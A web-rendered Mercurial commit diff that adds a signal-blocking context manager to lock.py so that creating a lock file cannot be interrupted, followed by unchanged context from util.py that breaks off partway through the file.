##// END OF EJS Templates
lock: block signal interrupt while making a lock file...
Yuya Nishihara -
r36840:d77c3b02 default
parent child Browse files
Show More
@@ -1,329 +1,389 b''
1 # lock.py - simple advisory locking scheme for mercurial
1 # lock.py - simple advisory locking scheme for mercurial
2 #
2 #
3 # Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
3 # Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import contextlib
10 import contextlib
11 import errno
11 import errno
12 import os
12 import os
13 import signal
13 import socket
14 import socket
14 import time
15 import time
15 import warnings
16 import warnings
16
17
17 from .i18n import _
18 from .i18n import _
18
19
19 from . import (
20 from . import (
20 encoding,
21 encoding,
21 error,
22 error,
22 pycompat,
23 pycompat,
23 util,
24 util,
24 )
25 )
25
26
26 def _getlockprefix():
27 def _getlockprefix():
27 """Return a string which is used to differentiate pid namespaces
28 """Return a string which is used to differentiate pid namespaces
28
29
29 It's useful to detect "dead" processes and remove stale locks with
30 It's useful to detect "dead" processes and remove stale locks with
30 confidence. Typically it's just hostname. On modern linux, we include an
31 confidence. Typically it's just hostname. On modern linux, we include an
31 extra Linux-specific pid namespace identifier.
32 extra Linux-specific pid namespace identifier.
32 """
33 """
33 result = encoding.strtolocal(socket.gethostname())
34 result = encoding.strtolocal(socket.gethostname())
34 if pycompat.sysplatform.startswith('linux'):
35 if pycompat.sysplatform.startswith('linux'):
35 try:
36 try:
36 result += '/%x' % os.stat('/proc/self/ns/pid').st_ino
37 result += '/%x' % os.stat('/proc/self/ns/pid').st_ino
37 except OSError as ex:
38 except OSError as ex:
38 if ex.errno not in (errno.ENOENT, errno.EACCES, errno.ENOTDIR):
39 if ex.errno not in (errno.ENOENT, errno.EACCES, errno.ENOTDIR):
39 raise
40 raise
40 return result
41 return result
41
42
43 @contextlib.contextmanager
44 def _delayedinterrupt():
45 """Block signal interrupt while doing something critical
46
47 This makes sure that the code block wrapped by this context manager won't
48 be interrupted.
49
50 For Windows developers: It appears not possible to guard time.sleep()
51 from CTRL_C_EVENT, so please don't use time.sleep() to test if this is
52 working.
53 """
54 assertedsigs = []
55 blocked = False
56 orighandlers = {}
57
58 def raiseinterrupt(num):
59 if (num == getattr(signal, 'SIGINT', None) or
60 num == getattr(signal, 'CTRL_C_EVENT', None)):
61 raise KeyboardInterrupt
62 else:
63 raise error.SignalInterrupt
64 def catchterm(num, frame):
65 if blocked:
66 assertedsigs.append(num)
67 else:
68 raiseinterrupt(num)
69
70 try:
71 # save handlers first so they can be restored even if a setup is
72 # interrupted between signal.signal() and orighandlers[] =.
73 for name in ['CTRL_C_EVENT', 'SIGINT', 'SIGBREAK', 'SIGHUP', 'SIGTERM']:
74 num = getattr(signal, name, None)
75 if num and num not in orighandlers:
76 orighandlers[num] = signal.getsignal(num)
77 try:
78 for num in orighandlers:
79 signal.signal(num, catchterm)
80 except ValueError:
81 pass # in a thread? no luck
82
83 blocked = True
84 yield
85 finally:
86 # no simple way to reliably restore all signal handlers because
87 # any loops, recursive function calls, except blocks, etc. can be
88 # interrupted. so instead, make catchterm() raise interrupt.
89 blocked = False
90 try:
91 for num, handler in orighandlers.items():
92 signal.signal(num, handler)
93 except ValueError:
94 pass # in a thread?
95
96 # re-raise interrupt exception if any, which may be shadowed by a new
97 # interrupt occurred while re-raising the first one
98 if assertedsigs:
99 raiseinterrupt(assertedsigs[0])
100
42 def trylock(ui, vfs, lockname, timeout, warntimeout, *args, **kwargs):
101 def trylock(ui, vfs, lockname, timeout, warntimeout, *args, **kwargs):
43 """return an acquired lock or raise an a LockHeld exception
102 """return an acquired lock or raise an a LockHeld exception
44
103
45 This function is responsible to issue warnings and or debug messages about
104 This function is responsible to issue warnings and or debug messages about
46 the held lock while trying to acquires it."""
105 the held lock while trying to acquires it."""
47
106
48 def printwarning(printer, locker):
107 def printwarning(printer, locker):
49 """issue the usual "waiting on lock" message through any channel"""
108 """issue the usual "waiting on lock" message through any channel"""
50 # show more details for new-style locks
109 # show more details for new-style locks
51 if ':' in locker:
110 if ':' in locker:
52 host, pid = locker.split(":", 1)
111 host, pid = locker.split(":", 1)
53 msg = (_("waiting for lock on %s held by process %r on host %r\n")
112 msg = (_("waiting for lock on %s held by process %r on host %r\n")
54 % (pycompat.bytestr(l.desc), pycompat.bytestr(pid),
113 % (pycompat.bytestr(l.desc), pycompat.bytestr(pid),
55 pycompat.bytestr(host)))
114 pycompat.bytestr(host)))
56 else:
115 else:
57 msg = (_("waiting for lock on %s held by %r\n")
116 msg = (_("waiting for lock on %s held by %r\n")
58 % (l.desc, pycompat.bytestr(locker)))
117 % (l.desc, pycompat.bytestr(locker)))
59 printer(msg)
118 printer(msg)
60
119
61 l = lock(vfs, lockname, 0, *args, dolock=False, **kwargs)
120 l = lock(vfs, lockname, 0, *args, dolock=False, **kwargs)
62
121
63 debugidx = 0 if (warntimeout and timeout) else -1
122 debugidx = 0 if (warntimeout and timeout) else -1
64 warningidx = 0
123 warningidx = 0
65 if not timeout:
124 if not timeout:
66 warningidx = -1
125 warningidx = -1
67 elif warntimeout:
126 elif warntimeout:
68 warningidx = warntimeout
127 warningidx = warntimeout
69
128
70 delay = 0
129 delay = 0
71 while True:
130 while True:
72 try:
131 try:
73 l._trylock()
132 l._trylock()
74 break
133 break
75 except error.LockHeld as inst:
134 except error.LockHeld as inst:
76 if delay == debugidx:
135 if delay == debugidx:
77 printwarning(ui.debug, inst.locker)
136 printwarning(ui.debug, inst.locker)
78 if delay == warningidx:
137 if delay == warningidx:
79 printwarning(ui.warn, inst.locker)
138 printwarning(ui.warn, inst.locker)
80 if timeout <= delay:
139 if timeout <= delay:
81 raise error.LockHeld(errno.ETIMEDOUT, inst.filename,
140 raise error.LockHeld(errno.ETIMEDOUT, inst.filename,
82 l.desc, inst.locker)
141 l.desc, inst.locker)
83 time.sleep(1)
142 time.sleep(1)
84 delay += 1
143 delay += 1
85
144
86 l.delay = delay
145 l.delay = delay
87 if l.delay:
146 if l.delay:
88 if 0 <= warningidx <= l.delay:
147 if 0 <= warningidx <= l.delay:
89 ui.warn(_("got lock after %d seconds\n") % l.delay)
148 ui.warn(_("got lock after %d seconds\n") % l.delay)
90 else:
149 else:
91 ui.debug("got lock after %d seconds\n" % l.delay)
150 ui.debug("got lock after %d seconds\n" % l.delay)
92 if l.acquirefn:
151 if l.acquirefn:
93 l.acquirefn()
152 l.acquirefn()
94 return l
153 return l
95
154
96 class lock(object):
155 class lock(object):
97 '''An advisory lock held by one process to control access to a set
156 '''An advisory lock held by one process to control access to a set
98 of files. Non-cooperating processes or incorrectly written scripts
157 of files. Non-cooperating processes or incorrectly written scripts
99 can ignore Mercurial's locking scheme and stomp all over the
158 can ignore Mercurial's locking scheme and stomp all over the
100 repository, so don't do that.
159 repository, so don't do that.
101
160
102 Typically used via localrepository.lock() to lock the repository
161 Typically used via localrepository.lock() to lock the repository
103 store (.hg/store/) or localrepository.wlock() to lock everything
162 store (.hg/store/) or localrepository.wlock() to lock everything
104 else under .hg/.'''
163 else under .hg/.'''
105
164
106 # lock is symlink on platforms that support it, file on others.
165 # lock is symlink on platforms that support it, file on others.
107
166
108 # symlink is used because create of directory entry and contents
167 # symlink is used because create of directory entry and contents
109 # are atomic even over nfs.
168 # are atomic even over nfs.
110
169
111 # old-style lock: symlink to pid
170 # old-style lock: symlink to pid
112 # new-style lock: symlink to hostname:pid
171 # new-style lock: symlink to hostname:pid
113
172
114 _host = None
173 _host = None
115
174
116 def __init__(self, vfs, file, timeout=-1, releasefn=None, acquirefn=None,
175 def __init__(self, vfs, file, timeout=-1, releasefn=None, acquirefn=None,
117 desc=None, inheritchecker=None, parentlock=None,
176 desc=None, inheritchecker=None, parentlock=None,
118 dolock=True):
177 dolock=True):
119 self.vfs = vfs
178 self.vfs = vfs
120 self.f = file
179 self.f = file
121 self.held = 0
180 self.held = 0
122 self.timeout = timeout
181 self.timeout = timeout
123 self.releasefn = releasefn
182 self.releasefn = releasefn
124 self.acquirefn = acquirefn
183 self.acquirefn = acquirefn
125 self.desc = desc
184 self.desc = desc
126 self._inheritchecker = inheritchecker
185 self._inheritchecker = inheritchecker
127 self.parentlock = parentlock
186 self.parentlock = parentlock
128 self._parentheld = False
187 self._parentheld = False
129 self._inherited = False
188 self._inherited = False
130 self.postrelease = []
189 self.postrelease = []
131 self.pid = self._getpid()
190 self.pid = self._getpid()
132 if dolock:
191 if dolock:
133 self.delay = self.lock()
192 self.delay = self.lock()
134 if self.acquirefn:
193 if self.acquirefn:
135 self.acquirefn()
194 self.acquirefn()
136
195
137 def __enter__(self):
196 def __enter__(self):
138 return self
197 return self
139
198
140 def __exit__(self, exc_type, exc_value, exc_tb):
199 def __exit__(self, exc_type, exc_value, exc_tb):
141 self.release()
200 self.release()
142
201
143 def __del__(self):
202 def __del__(self):
144 if self.held:
203 if self.held:
145 warnings.warn("use lock.release instead of del lock",
204 warnings.warn("use lock.release instead of del lock",
146 category=DeprecationWarning,
205 category=DeprecationWarning,
147 stacklevel=2)
206 stacklevel=2)
148
207
149 # ensure the lock will be removed
208 # ensure the lock will be removed
150 # even if recursive locking did occur
209 # even if recursive locking did occur
151 self.held = 1
210 self.held = 1
152
211
153 self.release()
212 self.release()
154
213
155 def _getpid(self):
214 def _getpid(self):
156 # wrapper around util.getpid() to make testing easier
215 # wrapper around util.getpid() to make testing easier
157 return util.getpid()
216 return util.getpid()
158
217
159 def lock(self):
218 def lock(self):
160 timeout = self.timeout
219 timeout = self.timeout
161 while True:
220 while True:
162 try:
221 try:
163 self._trylock()
222 self._trylock()
164 return self.timeout - timeout
223 return self.timeout - timeout
165 except error.LockHeld as inst:
224 except error.LockHeld as inst:
166 if timeout != 0:
225 if timeout != 0:
167 time.sleep(1)
226 time.sleep(1)
168 if timeout > 0:
227 if timeout > 0:
169 timeout -= 1
228 timeout -= 1
170 continue
229 continue
171 raise error.LockHeld(errno.ETIMEDOUT, inst.filename, self.desc,
230 raise error.LockHeld(errno.ETIMEDOUT, inst.filename, self.desc,
172 inst.locker)
231 inst.locker)
173
232
174 def _trylock(self):
233 def _trylock(self):
175 if self.held:
234 if self.held:
176 self.held += 1
235 self.held += 1
177 return
236 return
178 if lock._host is None:
237 if lock._host is None:
179 lock._host = _getlockprefix()
238 lock._host = _getlockprefix()
180 lockname = '%s:%d' % (lock._host, self.pid)
239 lockname = '%s:%d' % (lock._host, self.pid)
181 retry = 5
240 retry = 5
182 while not self.held and retry:
241 while not self.held and retry:
183 retry -= 1
242 retry -= 1
184 try:
243 try:
244 with _delayedinterrupt():
185 self.vfs.makelock(lockname, self.f)
245 self.vfs.makelock(lockname, self.f)
186 self.held = 1
246 self.held = 1
187 except (OSError, IOError) as why:
247 except (OSError, IOError) as why:
188 if why.errno == errno.EEXIST:
248 if why.errno == errno.EEXIST:
189 locker = self._readlock()
249 locker = self._readlock()
190 if locker is None:
250 if locker is None:
191 continue
251 continue
192
252
193 # special case where a parent process holds the lock -- this
253 # special case where a parent process holds the lock -- this
194 # is different from the pid being different because we do
254 # is different from the pid being different because we do
195 # want the unlock and postrelease functions to be called,
255 # want the unlock and postrelease functions to be called,
196 # but the lockfile to not be removed.
256 # but the lockfile to not be removed.
197 if locker == self.parentlock:
257 if locker == self.parentlock:
198 self._parentheld = True
258 self._parentheld = True
199 self.held = 1
259 self.held = 1
200 return
260 return
201 locker = self._testlock(locker)
261 locker = self._testlock(locker)
202 if locker is not None:
262 if locker is not None:
203 raise error.LockHeld(errno.EAGAIN,
263 raise error.LockHeld(errno.EAGAIN,
204 self.vfs.join(self.f), self.desc,
264 self.vfs.join(self.f), self.desc,
205 locker)
265 locker)
206 else:
266 else:
207 raise error.LockUnavailable(why.errno, why.strerror,
267 raise error.LockUnavailable(why.errno, why.strerror,
208 why.filename, self.desc)
268 why.filename, self.desc)
209
269
210 if not self.held:
270 if not self.held:
211 # use empty locker to mean "busy for frequent lock/unlock
271 # use empty locker to mean "busy for frequent lock/unlock
212 # by many processes"
272 # by many processes"
213 raise error.LockHeld(errno.EAGAIN,
273 raise error.LockHeld(errno.EAGAIN,
214 self.vfs.join(self.f), self.desc, "")
274 self.vfs.join(self.f), self.desc, "")
215
275
216 def _readlock(self):
276 def _readlock(self):
217 """read lock and return its value
277 """read lock and return its value
218
278
219 Returns None if no lock exists, pid for old-style locks, and host:pid
279 Returns None if no lock exists, pid for old-style locks, and host:pid
220 for new-style locks.
280 for new-style locks.
221 """
281 """
222 try:
282 try:
223 return self.vfs.readlock(self.f)
283 return self.vfs.readlock(self.f)
224 except (OSError, IOError) as why:
284 except (OSError, IOError) as why:
225 if why.errno == errno.ENOENT:
285 if why.errno == errno.ENOENT:
226 return None
286 return None
227 raise
287 raise
228
288
229 def _testlock(self, locker):
289 def _testlock(self, locker):
230 if locker is None:
290 if locker is None:
231 return None
291 return None
232 try:
292 try:
233 host, pid = locker.split(":", 1)
293 host, pid = locker.split(":", 1)
234 except ValueError:
294 except ValueError:
235 return locker
295 return locker
236 if host != lock._host:
296 if host != lock._host:
237 return locker
297 return locker
238 try:
298 try:
239 pid = int(pid)
299 pid = int(pid)
240 except ValueError:
300 except ValueError:
241 return locker
301 return locker
242 if util.testpid(pid):
302 if util.testpid(pid):
243 return locker
303 return locker
244 # if locker dead, break lock. must do this with another lock
304 # if locker dead, break lock. must do this with another lock
245 # held, or can race and break valid lock.
305 # held, or can race and break valid lock.
246 try:
306 try:
247 l = lock(self.vfs, self.f + '.break', timeout=0)
307 l = lock(self.vfs, self.f + '.break', timeout=0)
248 self.vfs.unlink(self.f)
308 self.vfs.unlink(self.f)
249 l.release()
309 l.release()
250 except error.LockError:
310 except error.LockError:
251 return locker
311 return locker
252
312
253 def testlock(self):
313 def testlock(self):
254 """return id of locker if lock is valid, else None.
314 """return id of locker if lock is valid, else None.
255
315
256 If old-style lock, we cannot tell what machine locker is on.
316 If old-style lock, we cannot tell what machine locker is on.
257 with new-style lock, if locker is on this machine, we can
317 with new-style lock, if locker is on this machine, we can
258 see if locker is alive. If locker is on this machine but
318 see if locker is alive. If locker is on this machine but
259 not alive, we can safely break lock.
319 not alive, we can safely break lock.
260
320
261 The lock file is only deleted when None is returned.
321 The lock file is only deleted when None is returned.
262
322
263 """
323 """
264 locker = self._readlock()
324 locker = self._readlock()
265 return self._testlock(locker)
325 return self._testlock(locker)
266
326
267 @contextlib.contextmanager
327 @contextlib.contextmanager
268 def inherit(self):
328 def inherit(self):
269 """context for the lock to be inherited by a Mercurial subprocess.
329 """context for the lock to be inherited by a Mercurial subprocess.
270
330
271 Yields a string that will be recognized by the lock in the subprocess.
331 Yields a string that will be recognized by the lock in the subprocess.
272 Communicating this string to the subprocess needs to be done separately
332 Communicating this string to the subprocess needs to be done separately
273 -- typically by an environment variable.
333 -- typically by an environment variable.
274 """
334 """
275 if not self.held:
335 if not self.held:
276 raise error.LockInheritanceContractViolation(
336 raise error.LockInheritanceContractViolation(
277 'inherit can only be called while lock is held')
337 'inherit can only be called while lock is held')
278 if self._inherited:
338 if self._inherited:
279 raise error.LockInheritanceContractViolation(
339 raise error.LockInheritanceContractViolation(
280 'inherit cannot be called while lock is already inherited')
340 'inherit cannot be called while lock is already inherited')
281 if self._inheritchecker is not None:
341 if self._inheritchecker is not None:
282 self._inheritchecker()
342 self._inheritchecker()
283 if self.releasefn:
343 if self.releasefn:
284 self.releasefn()
344 self.releasefn()
285 if self._parentheld:
345 if self._parentheld:
286 lockname = self.parentlock
346 lockname = self.parentlock
287 else:
347 else:
288 lockname = '%s:%s' % (lock._host, self.pid)
348 lockname = '%s:%s' % (lock._host, self.pid)
289 self._inherited = True
349 self._inherited = True
290 try:
350 try:
291 yield lockname
351 yield lockname
292 finally:
352 finally:
293 if self.acquirefn:
353 if self.acquirefn:
294 self.acquirefn()
354 self.acquirefn()
295 self._inherited = False
355 self._inherited = False
296
356
297 def release(self):
357 def release(self):
298 """release the lock and execute callback function if any
358 """release the lock and execute callback function if any
299
359
300 If the lock has been acquired multiple times, the actual release is
360 If the lock has been acquired multiple times, the actual release is
301 delayed to the last release call."""
361 delayed to the last release call."""
302 if self.held > 1:
362 if self.held > 1:
303 self.held -= 1
363 self.held -= 1
304 elif self.held == 1:
364 elif self.held == 1:
305 self.held = 0
365 self.held = 0
306 if self._getpid() != self.pid:
366 if self._getpid() != self.pid:
307 # we forked, and are not the parent
367 # we forked, and are not the parent
308 return
368 return
309 try:
369 try:
310 if self.releasefn:
370 if self.releasefn:
311 self.releasefn()
371 self.releasefn()
312 finally:
372 finally:
313 if not self._parentheld:
373 if not self._parentheld:
314 try:
374 try:
315 self.vfs.unlink(self.f)
375 self.vfs.unlink(self.f)
316 except OSError:
376 except OSError:
317 pass
377 pass
318 # The postrelease functions typically assume the lock is not held
378 # The postrelease functions typically assume the lock is not held
319 # at all.
379 # at all.
320 if not self._parentheld:
380 if not self._parentheld:
321 for callback in self.postrelease:
381 for callback in self.postrelease:
322 callback()
382 callback()
323 # Prevent double usage and help clear cycles.
383 # Prevent double usage and help clear cycles.
324 self.postrelease = None
384 self.postrelease = None
325
385
326 def release(*locks):
386 def release(*locks):
327 for lock in locks:
387 for lock in locks:
328 if lock is not None:
388 if lock is not None:
329 lock.release()
389 lock.release()
@@ -1,4061 +1,4066 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import codecs
20 import codecs
21 import collections
21 import collections
22 import contextlib
22 import contextlib
23 import errno
23 import errno
24 import gc
24 import gc
25 import hashlib
25 import hashlib
26 import imp
26 import imp
27 import io
27 import io
28 import itertools
28 import itertools
29 import mmap
29 import mmap
30 import os
30 import os
31 import platform as pyplatform
31 import platform as pyplatform
32 import re as remod
32 import re as remod
33 import shutil
33 import shutil
34 import signal
34 import signal
35 import socket
35 import socket
36 import stat
36 import stat
37 import string
37 import string
38 import subprocess
38 import subprocess
39 import sys
39 import sys
40 import tempfile
40 import tempfile
41 import textwrap
41 import textwrap
42 import time
42 import time
43 import traceback
43 import traceback
44 import warnings
44 import warnings
45 import zlib
45 import zlib
46
46
47 from . import (
47 from . import (
48 encoding,
48 encoding,
49 error,
49 error,
50 i18n,
50 i18n,
51 node as nodemod,
51 node as nodemod,
52 policy,
52 policy,
53 pycompat,
53 pycompat,
54 urllibcompat,
54 urllibcompat,
55 )
55 )
56 from .utils import dateutil
56 from .utils import dateutil
57
57
58 base85 = policy.importmod(r'base85')
58 base85 = policy.importmod(r'base85')
59 osutil = policy.importmod(r'osutil')
59 osutil = policy.importmod(r'osutil')
60 parsers = policy.importmod(r'parsers')
60 parsers = policy.importmod(r'parsers')
61
61
62 b85decode = base85.b85decode
62 b85decode = base85.b85decode
63 b85encode = base85.b85encode
63 b85encode = base85.b85encode
64
64
65 cookielib = pycompat.cookielib
65 cookielib = pycompat.cookielib
66 empty = pycompat.empty
66 empty = pycompat.empty
67 httplib = pycompat.httplib
67 httplib = pycompat.httplib
68 pickle = pycompat.pickle
68 pickle = pycompat.pickle
69 queue = pycompat.queue
69 queue = pycompat.queue
70 socketserver = pycompat.socketserver
70 socketserver = pycompat.socketserver
71 stderr = pycompat.stderr
71 stderr = pycompat.stderr
72 stdin = pycompat.stdin
72 stdin = pycompat.stdin
73 stdout = pycompat.stdout
73 stdout = pycompat.stdout
74 stringio = pycompat.stringio
74 stringio = pycompat.stringio
75 xmlrpclib = pycompat.xmlrpclib
75 xmlrpclib = pycompat.xmlrpclib
76
76
77 httpserver = urllibcompat.httpserver
77 httpserver = urllibcompat.httpserver
78 urlerr = urllibcompat.urlerr
78 urlerr = urllibcompat.urlerr
79 urlreq = urllibcompat.urlreq
79 urlreq = urllibcompat.urlreq
80
80
81 # workaround for win32mbcs
81 # workaround for win32mbcs
82 _filenamebytestr = pycompat.bytestr
82 _filenamebytestr = pycompat.bytestr
83
83
84 def isatty(fp):
84 def isatty(fp):
85 try:
85 try:
86 return fp.isatty()
86 return fp.isatty()
87 except AttributeError:
87 except AttributeError:
88 return False
88 return False
89
89
90 # glibc determines buffering on first write to stdout - if we replace a TTY
90 # glibc determines buffering on first write to stdout - if we replace a TTY
91 # destined stdout with a pipe destined stdout (e.g. pager), we want line
91 # destined stdout with a pipe destined stdout (e.g. pager), we want line
92 # buffering
92 # buffering
93 if isatty(stdout):
93 if isatty(stdout):
94 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
94 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
95
95
96 if pycompat.iswindows:
96 if pycompat.iswindows:
97 from . import windows as platform
97 from . import windows as platform
98 stdout = platform.winstdout(stdout)
98 stdout = platform.winstdout(stdout)
99 else:
99 else:
100 from . import posix as platform
100 from . import posix as platform
101
101
102 _ = i18n._
102 _ = i18n._
103
103
104 bindunixsocket = platform.bindunixsocket
104 bindunixsocket = platform.bindunixsocket
105 cachestat = platform.cachestat
105 cachestat = platform.cachestat
106 checkexec = platform.checkexec
106 checkexec = platform.checkexec
107 checklink = platform.checklink
107 checklink = platform.checklink
108 copymode = platform.copymode
108 copymode = platform.copymode
109 executablepath = platform.executablepath
109 executablepath = platform.executablepath
110 expandglobs = platform.expandglobs
110 expandglobs = platform.expandglobs
111 explainexit = platform.explainexit
111 explainexit = platform.explainexit
112 findexe = platform.findexe
112 findexe = platform.findexe
113 getfsmountpoint = platform.getfsmountpoint
113 getfsmountpoint = platform.getfsmountpoint
114 getfstype = platform.getfstype
114 getfstype = platform.getfstype
115 gethgcmd = platform.gethgcmd
115 gethgcmd = platform.gethgcmd
116 getuser = platform.getuser
116 getuser = platform.getuser
117 getpid = os.getpid
117 getpid = os.getpid
118 groupmembers = platform.groupmembers
118 groupmembers = platform.groupmembers
119 groupname = platform.groupname
119 groupname = platform.groupname
120 hidewindow = platform.hidewindow
120 hidewindow = platform.hidewindow
121 isexec = platform.isexec
121 isexec = platform.isexec
122 isowner = platform.isowner
122 isowner = platform.isowner
123 listdir = osutil.listdir
123 listdir = osutil.listdir
124 localpath = platform.localpath
124 localpath = platform.localpath
125 lookupreg = platform.lookupreg
125 lookupreg = platform.lookupreg
126 makedir = platform.makedir
126 makedir = platform.makedir
127 nlinks = platform.nlinks
127 nlinks = platform.nlinks
128 normpath = platform.normpath
128 normpath = platform.normpath
129 normcase = platform.normcase
129 normcase = platform.normcase
130 normcasespec = platform.normcasespec
130 normcasespec = platform.normcasespec
131 normcasefallback = platform.normcasefallback
131 normcasefallback = platform.normcasefallback
132 openhardlinks = platform.openhardlinks
132 openhardlinks = platform.openhardlinks
133 oslink = platform.oslink
133 oslink = platform.oslink
134 parsepatchoutput = platform.parsepatchoutput
134 parsepatchoutput = platform.parsepatchoutput
135 pconvert = platform.pconvert
135 pconvert = platform.pconvert
136 poll = platform.poll
136 poll = platform.poll
137 popen = platform.popen
137 popen = platform.popen
138 posixfile = platform.posixfile
138 posixfile = platform.posixfile
139 quotecommand = platform.quotecommand
139 quotecommand = platform.quotecommand
140 readpipe = platform.readpipe
140 readpipe = platform.readpipe
141 rename = platform.rename
141 rename = platform.rename
142 removedirs = platform.removedirs
142 removedirs = platform.removedirs
143 samedevice = platform.samedevice
143 samedevice = platform.samedevice
144 samefile = platform.samefile
144 samefile = platform.samefile
145 samestat = platform.samestat
145 samestat = platform.samestat
146 setbinary = platform.setbinary
146 setbinary = platform.setbinary
147 setflags = platform.setflags
147 setflags = platform.setflags
148 setsignalhandler = platform.setsignalhandler
148 setsignalhandler = platform.setsignalhandler
149 shellquote = platform.shellquote
149 shellquote = platform.shellquote
150 shellsplit = platform.shellsplit
150 shellsplit = platform.shellsplit
151 spawndetached = platform.spawndetached
151 spawndetached = platform.spawndetached
152 split = platform.split
152 split = platform.split
153 sshargs = platform.sshargs
153 sshargs = platform.sshargs
154 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
154 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
155 statisexec = platform.statisexec
155 statisexec = platform.statisexec
156 statislink = platform.statislink
156 statislink = platform.statislink
157 testpid = platform.testpid
157 testpid = platform.testpid
158 umask = platform.umask
158 umask = platform.umask
159 unlink = platform.unlink
159 unlink = platform.unlink
160 username = platform.username
160 username = platform.username
161
161
162 try:
162 try:
163 recvfds = osutil.recvfds
163 recvfds = osutil.recvfds
164 except AttributeError:
164 except AttributeError:
165 pass
165 pass
166 try:
166 try:
167 setprocname = osutil.setprocname
167 setprocname = osutil.setprocname
168 except AttributeError:
168 except AttributeError:
169 pass
169 pass
170 try:
170 try:
171 unblocksignal = osutil.unblocksignal
171 unblocksignal = osutil.unblocksignal
172 except AttributeError:
172 except AttributeError:
173 pass
173 pass
174
174
175 # Python compatibility
175 # Python compatibility
176
176
177 _notset = object()
177 _notset = object()
178
178
179 # disable Python's problematic floating point timestamps (issue4836)
179 # disable Python's problematic floating point timestamps (issue4836)
180 # (Python hypocritically says you shouldn't change this behavior in
180 # (Python hypocritically says you shouldn't change this behavior in
181 # libraries, and sure enough Mercurial is not a library.)
181 # libraries, and sure enough Mercurial is not a library.)
182 os.stat_float_times(False)
182 os.stat_float_times(False)
183
183
184 def safehasattr(thing, attr):
184 def safehasattr(thing, attr):
185 return getattr(thing, attr, _notset) is not _notset
185 return getattr(thing, attr, _notset) is not _notset
186
186
187 def _rapply(f, xs):
187 def _rapply(f, xs):
188 if xs is None:
188 if xs is None:
189 # assume None means non-value of optional data
189 # assume None means non-value of optional data
190 return xs
190 return xs
191 if isinstance(xs, (list, set, tuple)):
191 if isinstance(xs, (list, set, tuple)):
192 return type(xs)(_rapply(f, x) for x in xs)
192 return type(xs)(_rapply(f, x) for x in xs)
193 if isinstance(xs, dict):
193 if isinstance(xs, dict):
194 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
194 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
195 return f(xs)
195 return f(xs)
196
196
197 def rapply(f, xs):
197 def rapply(f, xs):
198 """Apply function recursively to every item preserving the data structure
198 """Apply function recursively to every item preserving the data structure
199
199
200 >>> def f(x):
200 >>> def f(x):
201 ... return 'f(%s)' % x
201 ... return 'f(%s)' % x
202 >>> rapply(f, None) is None
202 >>> rapply(f, None) is None
203 True
203 True
204 >>> rapply(f, 'a')
204 >>> rapply(f, 'a')
205 'f(a)'
205 'f(a)'
206 >>> rapply(f, {'a'}) == {'f(a)'}
206 >>> rapply(f, {'a'}) == {'f(a)'}
207 True
207 True
208 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
208 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
209 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
209 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
210
210
211 >>> xs = [object()]
211 >>> xs = [object()]
212 >>> rapply(pycompat.identity, xs) is xs
212 >>> rapply(pycompat.identity, xs) is xs
213 True
213 True
214 """
214 """
215 if f is pycompat.identity:
215 if f is pycompat.identity:
216 # fast path mainly for py2
216 # fast path mainly for py2
217 return xs
217 return xs
218 return _rapply(f, xs)
218 return _rapply(f, xs)
219
219
220 def bytesinput(fin, fout, *args, **kwargs):
220 def bytesinput(fin, fout, *args, **kwargs):
221 sin, sout = sys.stdin, sys.stdout
221 sin, sout = sys.stdin, sys.stdout
222 try:
222 try:
223 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
223 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
224 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
224 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
225 finally:
225 finally:
226 sys.stdin, sys.stdout = sin, sout
226 sys.stdin, sys.stdout = sin, sout
227
227
228 def bitsfrom(container):
228 def bitsfrom(container):
229 bits = 0
229 bits = 0
230 for bit in container:
230 for bit in container:
231 bits |= bit
231 bits |= bit
232 return bits
232 return bits
233
233
234 # python 2.6 still have deprecation warning enabled by default. We do not want
234 # python 2.6 still have deprecation warning enabled by default. We do not want
235 # to display anything to standard user so detect if we are running test and
235 # to display anything to standard user so detect if we are running test and
236 # only use python deprecation warning in this case.
236 # only use python deprecation warning in this case.
237 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
237 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
238 if _dowarn:
238 if _dowarn:
239 # explicitly unfilter our warning for python 2.7
239 # explicitly unfilter our warning for python 2.7
240 #
240 #
241 # The option of setting PYTHONWARNINGS in the test runner was investigated.
